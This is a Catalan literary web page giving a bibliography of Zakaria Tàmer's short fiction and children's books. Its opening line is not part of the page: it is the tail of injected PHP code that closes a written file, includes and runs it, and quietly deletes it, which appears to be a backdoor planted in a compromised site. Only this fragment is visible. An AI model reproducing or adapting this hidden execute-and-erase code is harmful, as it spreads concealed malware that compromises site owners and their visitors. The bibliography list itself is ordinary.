");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Literatura universal en catalán - Zakaria Tàmer
Facebook Twitter

Libros de Zakaria Tàmer

Narrativa breu

 • TÀMER, Zakaria. Sahil al-iauad al-abiad [El renill del cavall blanc]. Londres: Riad el-Rayyes Books, 1994.
 • TÀMER, Zakaria. Rabi fi al-ramad [Primavera a les cendres]. Londres: Riad el-Rayyes Books, 2001.
 • TÀMER, Zakaria. Al-Rad [El tro]. Londres: Riad el-Rayyes Books, 1994.
 • TÀMER, Zakaria. Dimaixq al-haràiq [Els incendis de Damasc]. Londres: Riad el-Rayyes Books, 1994 (3a ed.)
 • TÀMER, Zakaria. Al-Numar fi al-iaum al-axir [Els tigres al desè dia]. Londres: Riad el-Rayyes Books, 1994 (3a ed.)
 • TÀMER, Zakaria. Nida Nuh [La crida de Noé]. Londres: Riad el-Rayyes Books, 1994.
 • TÀMER, Zakaria. Sanadhak [Riurem]. Londres: Riad el-Rayyes Books, 1998.
 • TÀMER, Zakaria. Al-Hisrim [L'agràs]. Londres: Riad el-Rayyes Books, 2000.
 • TÀMER, Zakaria. If! Mukhtarat qissassia. [Ecs! Contes satírics]. Beirut: 1998.
 • TÀMER, Zakaria. Taksir Rukab [Trencant els genolls]. Londres: Riad el-Rayyes Books, 2002.
 • TÀMER, Zakaria. al-Qunfudh [L'eriço], 2005.

Literatua infantil i juvenil

 • TÀMER, Zakaria. Li-mada sakata al-nahr [Per què ha emmudit el riu?]. Damasc, 1973.
 • TÀMER, Zakaria. Al-Bait [La casa]. Beirut, 1975.
 • TÀMER, Zakaria. Qalat al-uarda li-al-sununa [Allò que la rosa va dir a l'oreneta]. Damasc, 1977.
 • TÀMER, Zakaria. Bilad al-aranib [El país dels conills]. Beirut, 1979.
Fragments
Els fills
Neus Tirado Gual
L'amor
Oriol Carbonell
Presoners
Neus Tirado Gual
Bibliografia
Buscador de autores
A-B-C-D - E-F-G - H - I
J - K - L - M - N - O - P - Q - R
S-T-U-V-W-X-Y-Z
Con el soporte de: